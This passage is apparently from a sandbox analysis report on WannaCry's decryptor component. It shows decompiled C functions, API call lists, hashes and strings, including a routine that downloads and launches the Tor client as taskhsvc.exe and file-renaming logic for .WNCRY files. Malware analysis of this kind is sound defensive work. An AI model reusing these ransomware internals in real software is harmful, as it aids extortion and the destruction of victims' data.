                                    • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000000,0019FA30), ref: 0040B6B4
                                    • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                  • sprintf.MSVCRT ref: 0040B924
                                  • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040B934
                                    • Part of subcall function 0040B780: CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,0019FA30), ref: 0040B793
                                    • Part of subcall function 0040B780: GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                    • Part of subcall function 0040B780: DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                    • Part of subcall function 0040B780: URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                    • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B815
                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 0040B955
                                  • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9CF
                                  • WaitForSingleObject.KERNEL32(?,00007530,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9E2
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9EF
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9F6
                                    • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B82C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Delete$Create$AttributesCloseDirectoryHandleObjectSingleWaitsprintf$CacheCopyDownloadEntryNameProcessTemp
                                  • String ID: %s\%s\%s$D$TaskData$Tor$https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$s.wnry$taskhsvc.exe$tor.exe
                                  • API String ID: 4284242699-3937372533
                                  • Opcode ID: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                  • Instruction ID: 35d80fb58dc1195f77b7b167f0129d00e9adf464e01d9889cd120ecf7352bd78
                                  • Opcode Fuzzy Hash: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                  • Instruction Fuzzy Hash: 0C4137716443007AD710DBA4EC41BEBB7D4AFE8700F90883FF698532E1D6B99548879E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004032C0 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 114windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 69%
                                  			E004032C0(intOrPtr __ecx) {
				intOrPtr _t16;
				long _t17;
				struct HFONT__* _t19;
				long _t20;
				long _t21;
				long _t23;
				int _t35;
				int _t38;
				int _t40;
				int _t47;
				intOrPtr _t48;

				_t48 = __ecx;
				L00412CB0();
				_t16 =  *0x42189c; // 0x19f608
				_t17 =  *(_t16 + 0x824);
				 *(__ecx + 0xe8) = _t17;
				_push(CreateSolidBrush(_t17));
				L00412D5E();
				_t47 = __ecx + 0xec;
				_t19 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t19);
				L00412D5E();
				_push(0x408);
				L00412CE6();
				if(_t47 != 0) {
					_t35 =  *(_t47 + 4);
				} else {
					_t35 = 0;
				}
				_t20 = SendMessageA( *(_t19 + 0x20), 0x30, _t35, 1);
				_push(0x409);
				L00412CE6();
				if(_t47 != 0) {
					_t38 =  *(_t47 + 4);
				} else {
					_t38 = 0;
				}
				_t21 = SendMessageA( *(_t20 + 0x20), 0x30, _t38, 1);
				_push(2);
				L00412CE6();
				if(_t47 != 0) {
					_t40 =  *(_t47 + 4);
				} else {
					_t40 = 0;
				}
				_t23 = SendMessageA( *(_t21 + 0x20), 0x30, _t40, 1);
				_push(0x40e);
				L00412CE6();
				if(_t47 != 0) {
					_t47 =  *(_t47 + 4);
				}
				SendMessageA( *(_t23 + 0x20), 0x30, _t47, 1);
				E00403CB0(_t48);
				SendMessageA( *(_t48 + 0xc0), 0x14e, 0, 0);
				_push(0xffffffff);
				_push(0xffffffff);
				_push(0);
				_push("Path");
				_push(0);
				L00412D58();
				SendMessageA( *(_t48 + 0x80), 0x101e, 0, 0x1f4);
				 *0x4217bc = _t48;
				return 1;
			}














                                  0x004032c3
                                  0x004032c5
                                  0x004032ca
                                  0x004032cf
                                  0x004032d6
                                  0x004032e2
                                  0x004032e9
                                  0x00403310
                                  0x00403316
                                  0x0040331c
                                  0x0040331f
                                  0x00403324
                                  0x0040332b
                                  0x00403332
                                  0x00403338
                                  0x00403334
                                  0x00403334
                                  0x00403334
                                  0x0040334a
                                  0x0040334c
                                  0x00403353
                                  0x0040335a
                                  0x00403360
                                  0x0040335c
                                  0x0040335c
                                  0x0040335c
                                  0x0040336c
                                  0x0040336e
                                  0x00403372
                                  0x00403379
                                  0x0040337f
                                  0x0040337b
                                  0x0040337b
                                  0x0040337b
                                  0x0040338b
                                  0x0040338d
                                  0x00403394
                                  0x0040339b
                                  0x0040339d
                                  0x0040339d
                                  0x004033a9
                                  0x004033ad
                                  0x004033c2
                                  0x004033c4
                                  0x004033c6
                                  0x004033c8
                                  0x004033ca
                                  0x004033cf
                                  0x004033d4
                                  0x004033ec
                                  0x004033ee
                                  0x004033fc

                                  APIs
                                  • #4710.MFC42 ref: 004032C5
                                  • CreateSolidBrush.GDI32(?), ref: 004032DC
                                  • #1641.MFC42(00000000), ref: 004032E9
                                  • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00403316
                                  • #1641.MFC42(00000000), ref: 0040331F
                                  • #3092.MFC42(00000408,00000000), ref: 0040332B
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040334A
                                  • #3092.MFC42(00000409), ref: 00403353
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040336C
                                  • #3092.MFC42(00000002), ref: 00403372
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040338B
                                  • #3092.MFC42(0000040E), ref: 00403394
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 004033A9
                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004033C2
                                  • #3996.MFC42(00000000,Path,00000000,000000FF,000000FF), ref: 004033D4
                                  • SendMessageA.USER32(?,0000101E,00000000,000001F4), ref: 004033EC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#3092$#1641Create$#3996#4710BrushFontSolid
                                  • String ID: Arial$Path
                                  • API String ID: 2448086372-1872211634
                                  • Opcode ID: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                  • Instruction ID: b960ea7794e319caf0268359e71fff6d42033abaa4d887be80586a06fbef81fd
                                  • Opcode Fuzzy Hash: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                  • Instruction Fuzzy Hash: 4831D5B13907107BE6249760CD83FAE6659BB84B10F20421EB756BF2D1CEF8AD41879C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402C40 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 72libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00402C40() {
				_Unknown_base(*)()* _t11;
				struct HINSTANCE__* _t23;

				if(E00404B70() == 0) {
					L12:
					return 0;
				} else {
					if( *0x4217a0 == 0) {
						_t23 = LoadLibraryA("kernel32.dll");
						if(_t23 == 0) {
							goto L12;
						} else {
							 *0x4217a0 = GetProcAddress(_t23, "CreateFileW");
							 *0x4217a4 = GetProcAddress(_t23, "WriteFile");
							 *0x4217a8 = GetProcAddress(_t23, "ReadFile");
							 *0x4217ac = GetProcAddress(_t23, "MoveFileW");
							 *0x4217b0 = GetProcAddress(_t23, "MoveFileExW");
							 *0x4217b4 = GetProcAddress(_t23, "DeleteFileW");
							_t11 = GetProcAddress(_t23, "CloseHandle");
							 *0x4217b8 = _t11;
							if( *0x4217a0 == 0 ||  *0x4217a4 == 0 ||  *0x4217a8 == 0 ||  *0x4217ac == 0 ||  *0x4217b0 == 0 ||  *0x4217b4 == 0 || _t11 == 0) {
								goto L12;
							} else {
								return 1;
							}
						}
					} else {
						return 1;
					}
				}
			}





                                  0x00402c48
                                  0x00402d1d
                                  0x00402d20
                                  0x00402c4e
                                  0x00402c55
                                  0x00402c69
                                  0x00402c6d
                                  0x00000000
                                  0x00402c73
                                  0x00402c88
                                  0x00402c95
                                  0x00402ca2
                                  0x00402caf
                                  0x00402cbc
                                  0x00402cc9
                                  0x00402cce
                                  0x00402cd6
                                  0x00402cde
                                  0x00000000
                                  0x00402d16
                                  0x00402d1c
                                  0x00402d1c
                                  0x00402cde
                                  0x00402c57
                                  0x00402c5d
                                  0x00402c5d
                                  0x00402c55

                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
                                  • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
                                  • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
                                  • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
                                  • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
                                  • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
                                  • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
                                  • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                  • API String ID: 2238633743-1294736154
                                  • Opcode ID: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                  • Instruction ID: a2b5d8bb757b14b28e15fb80ad1863100e1319e91a413c2d323d0fcc62a15203
                                  • Opcode Fuzzy Hash: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                  • Instruction Fuzzy Hash: AA110334B423216BD734AB25BD58FA72695EFD4701795003FA801E76E1D7B89C42CA5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408D70 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 257COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E00408D70(intOrPtr __ecx, signed long long __fp0, intOrPtr* _a4, int _a8, signed int _a12, unsigned int _a16, signed int _a20) {
				intOrPtr _v0;
				unsigned int _v4;
				unsigned int _v8;
				unsigned int _v12;
				intOrPtr _v20;
				char _v36;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed long long _v100;
				intOrPtr _v104;
				void* _v108;
				void* _v112;
				void* _v120;
				unsigned int _t93;
				signed int _t96;
				signed int _t100;
				unsigned int _t102;
				signed int _t107;
				int _t112;
				char _t113;
				signed char _t115;
				RECT* _t122;
				signed int _t125;
				signed int _t134;
				intOrPtr* _t135;
				unsigned int _t138;
				signed int _t140;
				signed int _t143;
				intOrPtr* _t146;
				char _t151;
				char _t152;
				signed int _t169;
				intOrPtr* _t177;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t195;
				unsigned int _t202;
				char _t209;
				intOrPtr _t210;
				signed long long _t228;
				signed long long _t229;
				signed long long _t230;
				signed long long _t231;
				signed long long _t234;

				_t228 = __fp0;
				_push(0xffffffff);
				_push(E004140A0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t210;
				_t93 = _a20;
				_v104 = __ecx;
				_t138 = _a16;
				_t169 = _t138 & 0x000000ff;
				_v76 = _t169;
				_t192 = (_t93 & 0x000000ff) - _t169;
				_t140 = _t138 >> 0x00000010 & 0x000000ff;
				_t96 = (_t93 >> 0x00000010 & 0x000000ff) - _t140;
				_v88 = 0;
				_v96 = _t96;
				_v92 = _t140;
				asm("cdq");
				_t143 = _t96 ^ 0;
				_v100 = 0;
				asm("cdq");
				_a20 = _t192;
				_t134 = 0;
				if(0 <= _t143) {
					_t134 = _t143;
				}
				asm("cdq");
				_t100 = _t192 ^ 0;
				if(_t100 <= _t134) {
					_a16 = 0;
					if(0 <= _t143) {
						_a16 = _t143;
					}
				} else {
					_a16 = _t100;
				}
				_t193 = _a8;
				_t102 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
				if(_t102 < _a16) {
					_a16 = _t102;
				}
				if(_a16 == 0) {
					_a16 = 1;
				}
				asm("fild dword [esp+0x88]");
				asm("fild dword [esp+0x8c]");
				_t135 = _a4;
				_t229 = _t228 / st1;
				_v80 = _t229;
				asm("fild dword [esp+0x1c]");
				_t230 = _t229 / st1;
				_v100 = _t230;
				asm("fild dword [esp+0x20]");
				_t231 = _t230 / st1;
				_v96 = _t231;
				st0 = _t231;
				_t107 = GetDeviceCaps( *( *_t135 + 8), 0x26) & 0x00000100;
				_v80 = _t107;
				if(_t107 == 0 && _a8 > 1) {
					_t125 = GetDeviceCaps( *( *_t135 + 8), 0xc);
					if(GetDeviceCaps( *( *_t135 + 8), 0xe) * _t125 < 8) {
						_v8 = 1;
					}
				}
				_t146 = _t193;
				_a12 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
				_t202 = 0;
				asm("fild dword [esp+0x8c]");
				_v72 = 0;
				_v68 =  *_t146;
				_v76 = 0x415a44;
				asm("fidiv dword [esp+0x88]");
				_v64 =  *((intOrPtr*)(_t146 + 4));
				_v60 =  *((intOrPtr*)(_t146 + 8));
				_v56 =  *((intOrPtr*)(_t146 + 0xc));
				_a12 = _t231;
				_t112 = _a8;
				_v12 = 0;
				_v4 = 0;
				if(_t112 <= 0) {
					L31:
					_v76 = 0x415c00;
					_v12 = 1;
					L00412D52();
					 *[fs:0x0] = _v20;
					return _t112;
				} else {
					while(1) {
						asm("fild dword [esp+0x7c]");
						_t195 =  *_t193;
						L0041304A();
						_t46 = _t202 + 1; // 0x1
						_v4 = _t46;
						_t209 = _t112 + _t195;
						asm("fild dword [esp+0x7c]");
						_v68 = _t209;
						_t234 = st0 * _a12 * _a12;
						L0041304A();
						_t113 = _t112 + _t195;
						_v60 = _t113;
						if(_t202 == _a8 - 1) {
							_t113 =  *((intOrPtr*)(_v0 + 8));
							_v60 = _t113;
						}
						_t177 = _a4;
						_t151 =  *_t177;
						if(_t113 < _t151) {
							goto L29;
						}
						if(_t209 < _t151) {
							_v68 = _t151;
						}
						_t152 =  *((intOrPtr*)(_t177 + 8));
						if(_t113 > _t152) {
							_v60 = _t152;
						}
						L0041304A();
						_v92 = 0;
						L0041304A();
						_t115 = _t113 + _v100 + _v96;
						_v92 = _t115 << 8;
						L0041304A();
						_push(_t115 + _v84 & 0x000000ff | _v92);
						if(_v80 == 0) {
							_t112 = E00409D40( &_v36, _t135,  &_v68);
							_push(_t112);
							L00412FF2();
						} else {
							_push(CreateSolidBrush());
							L00412D5E();
							_t122 = E00409D40( &_v60, _t135,  &_v76);
							_t76 =  &_v96; // 0x415a44
							asm("sbb ecx, ecx");
							_t112 = FillRect( *( *_t135 + 4), _t122,  ~_t76 & _v92);
							L00412D52();
						}
						if(_v68 <  *((intOrPtr*)(_v4 + 8))) {
							L30:
							_t202 = _v4;
							_t112 = _a8;
							_v4 = _t202;
							if(_t202 < _t112) {
								_t193 = _v0;
								continue;
							}
						}
						goto L31;
						L29:
						st0 = _t234;
						goto L30;
					}
				}
			}
























































                                  0x00408d70
                                  0x00408d70
                                  0x00408d72
                                  0x00408d7d
                                  0x00408d7e
                                  0x00408d88
                                  0x00408d8d
                                  0x00408d92
                                  0x00408d9f
                                  0x00408dab
                                  0x00408daf
                                  0x00408dc5
                                  0x00408dd6
                                  0x00408dd8
                                  0x00408dde
                                  0x00408de2
                                  0x00408de6
                                  0x00408def
                                  0x00408df1
                                  0x00408df5
                                  0x00408df8
                                  0x00408e05
                                  0x00408e07
                                  0x00408e09
                                  0x00408e09
                                  0x00408e0d
                                  0x00408e10
                                  0x00408e14
                                  0x00408e21
                                  0x00408e28
                                  0x00408e2a
                                  0x00408e2a
                                  0x00408e16
                                  0x00408e16
                                  0x00408e16
                                  0x00408e31
                                  0x00408e44
                                  0x00408e48
                                  0x00408e4a
                                  0x00408e4a
                                  0x00408e5a
                                  0x00408e5c
                                  0x00408e5c
                                  0x00408e67
                                  0x00408e6e
                                  0x00408e75
                                  0x00408e81
                                  0x00408e89
                                  0x00408e8d
                                  0x00408e91
                                  0x00408e93
                                  0x00408e97
                                  0x00408e9b
                                  0x00408e9d
                                  0x00408ea1
                                  0x00408ea5
                                  0x00408eaa
                                  0x00408eae
                                  0x00408ec2
                                  0x00408ed6
                                  0x00408ed8
                                  0x00408ed8
                                  0x00408ed6
                                  0x00408eea
                                  0x00408eec
                                  0x00408ef3
                                  0x00408ef5
                                  0x00408efe
                                  0x00408f02
                                  0x00408f06
                                  0x00408f0e
                                  0x00408f18
                                  0x00408f1f
                                  0x00408f26
                                  0x00408f2a
                                  0x00408f31
                                  0x00408f38
                                  0x00408f3e
                                  0x00408f42
                                  0x004090b6
                                  0x004090b6
                                  0x004090c2
                                  0x004090ca
                                  0x004090d7
                                  0x004090e1
                                  0x00408f48
                                  0x00408f51
                                  0x00408f51
                                  0x00408f55
                                  0x00408f60
                                  0x00408f65
                                  0x00408f6a
                                  0x00408f6e
                                  0x00408f70
                                  0x00408f74
                                  0x00408f78
                                  0x00408f7f
                                  0x00408f8b
                                  0x00408f8d
                                  0x00408f96
                                  0x00408f9f
                                  0x00408fa2
                                  0x00408fa2
                                  0x00408fa6
                                  0x00408fad
                                  0x00408fb1
                                  0x00000000
                                  0x00000000
                                  0x00408fb9
                                  0x00408fbb
                                  0x00408fbb
                                  0x00408fbf
                                  0x00408fc4
                                  0x00408fc6
                                  0x00408fc6
                                  0x00408fd0
                                  0x00408fe5
                                  0x00408fe9
                                  0x00408ffa
                                  0x00409001
                                  0x00409005
                                  0x00409021
                                  0x00409022
                                  0x0040907e
                                  0x00409085
                                  0x00409086
                                  0x00409024
                                  0x0040902a
                                  0x0040902f
                                  0x00409043
                                  0x0040904e
                                  0x00409054
                                  0x0040905e
                                  0x00409068
                                  0x00409068
                                  0x00409099
                                  0x0040909f
                                  0x0040909f
                                  0x004090a3
                                  0x004090ac
                                  0x004090b0
                                  0x00408f4a
                                  0x00000000
                                  0x00408f4a
                                  0x004090b0
                                  0x00000000
                                  0x0040909d
                                  0x0040909d
                                  0x00000000
                                  0x0040909d
                                  0x00408f51

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _ftol$CapsDevice$#2414$#1641#2754BrushCreateFillRectSolid
                                  • String ID: DZA
                                  • API String ID: 2487345631-3378329814
                                  • Opcode ID: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                  • Instruction ID: dda82c2241e8f2351b86cfb5efeedf8da928c70a362fdc9ee550b763b14e0e54
                                  • Opcode Fuzzy Hash: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                  • Instruction Fuzzy Hash: 2CA147716087418FC324DF25C984AAABBE1FFC8704F148A2EF599D7291DA39D845CF86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404DD0 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 89windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E00404DD0(void* __ecx) {
				intOrPtr _t12;
				long _t13;
				struct HFONT__* _t15;
				long _t16;
				long _t17;
				int _t29;
				int _t32;
				int _t35;

				L00412CB0();
				_t12 =  *0x42189c; // 0x19f608
				_t13 =  *(_t12 + 0x824);
				 *(__ecx + 0x6c) = _t13;
				_push(CreateSolidBrush(_t13));
				L00412D5E();
				_t35 = __ecx + 0x70;
				_t15 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t15);
				L00412D5E();
				_push(0x403);
				L00412CE6();
				if(_t35 != 0) {
					_t29 =  *(_t35 + 4);
				} else {
					_t29 = 0;
				}
				_t16 = SendMessageA( *(_t15 + 0x20), 0x30, _t29, 1);
				_push(1);
				L00412CE6();
				if(_t35 != 0) {
					_t32 =  *(_t35 + 4);
				} else {
					_t32 = 0;
				}
				_t17 = SendMessageA( *(_t16 + 0x20), 0x30, _t32, 1);
				_push(2);
				L00412CE6();
				if(_t35 != 0) {
					SendMessageA( *(_t17 + 0x20), 0x30,  *(_t35 + 4), 1);
					return 1;
				} else {
					SendMessageA( *(_t17 + 0x20), 0x30, _t35, 1);
					return 1;
				}
			}











                                  0x00404dd5
                                  0x00404dda
                                  0x00404ddf
                                  0x00404de6
                                  0x00404def
                                  0x00404df3
                                  0x00404e1a
                                  0x00404e1d
                                  0x00404e23
                                  0x00404e26
                                  0x00404e2b
                                  0x00404e32
                                  0x00404e39
                                  0x00404e3f
                                  0x00404e3b
                                  0x00404e3b
                                  0x00404e3b
                                  0x00404e51
                                  0x00404e53
                                  0x00404e57
                                  0x00404e5e
                                  0x00404e64
                                  0x00404e60
                                  0x00404e60
                                  0x00404e60
                                  0x00404e70
                                  0x00404e72
                                  0x00404e76
                                  0x00404e7d
                                  0x00404e9f
                                  0x00404ea9
                                  0x00404e7f
                                  0x00404e88
                                  0x00404e92
                                  0x00404e92

                                  APIs
                                  • #4710.MFC42 ref: 00404DD5
                                  • CreateSolidBrush.GDI32(?), ref: 00404DE9
                                  • #1641.MFC42(00000000), ref: 00404DF3
                                  • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00404E1D
                                  • #1641.MFC42(00000000), ref: 00404E26
                                  • #3092.MFC42(00000403,00000000), ref: 00404E32
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E51
                                  • #3092.MFC42(00000001), ref: 00404E57
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E70
                                  • #3092.MFC42(00000002), ref: 00404E76
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E88
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#3092$#1641Create$#4710BrushFontSolid
                                  • String ID: Arial
                                  • API String ID: 1126252797-493054409
                                  • Opcode ID: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                  • Instruction ID: f8dd995afa615cab71677879a74d6ff7c2e305333cbfc3da3be905e2a6067967
                                  • Opcode Fuzzy Hash: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                  • Instruction Fuzzy Hash: CC21C6B13507107FE625A764DD86FAA2759BBC8B40F10011EB345AB2D1CAF5EC41879C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402560 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 81fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E00402560(intOrPtr __ecx, WCHAR* _a4) {
				short _v720;
				intOrPtr _v724;
				void* _t21;
				void* _t22;
				WCHAR* _t23;
				void* _t30;
				short* _t31;
				intOrPtr* _t32;
				void* _t34;
				void* _t36;

				_t23 = _a4;
				_v724 = __ecx;
				_t30 = 0;
				wcscpy( &_v720, _t23);
				_t31 = wcsrchr( &_v720, 0x2e);
				_t34 =  &_v724 + 0x10;
				if(_t31 == 0) {
					L4:
					wcscat( &_v720, L".org");
				} else {
					_t32 = __imp___wcsicmp;
					_t21 =  *_t32(_t31, L".WNCRY");
					_t36 = _t34 + 8;
					if(_t21 == 0) {
						L3:
						 *_t31 = 0;
						_t30 = 1;
					} else {
						_t22 =  *_t32(_t31, L".WNCYR");
						_t34 = _t36 + 8;
						if(_t22 != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				if(E004020A0(_v724, _t23,  &_v720) == 0) {
					DeleteFileW( &_v720);
					goto L11;
				} else {
					if(DeleteFileW(_t23) == 0) {
						L11:
						return 0;
					} else {
						if(_t30 != 0) {
							return 1;
						} else {
							return MoveFileW( &_v720, _t23);
						}
					}
				}
			}













                                  0x00402567
                                  0x00402576
                                  0x0040257b
                                  0x0040257d
                                  0x00402590
                                  0x00402592
                                  0x00402597
                                  0x004025c9
                                  0x004025d3
                                  0x00402599
                                  0x00402599
                                  0x004025a5
                                  0x004025a7
                                  0x004025ac
                                  0x004025bd
                                  0x004025bd
                                  0x004025c2
                                  0x004025ae
                                  0x004025b4
                                  0x004025b6
                                  0x004025bb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004025bb
                                  0x004025ac
                                  0x004025ed
                                  0x0040262e
                                  0x00000000
                                  0x004025ef
                                  0x004025f8
                                  0x00402637
                                  0x00402640
                                  0x004025fa
                                  0x004025fc
                                  0x00402626
                                  0x004025fe
                                  0x00402614
                                  0x00402614
                                  0x004025fc
                                  0x004025f8

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
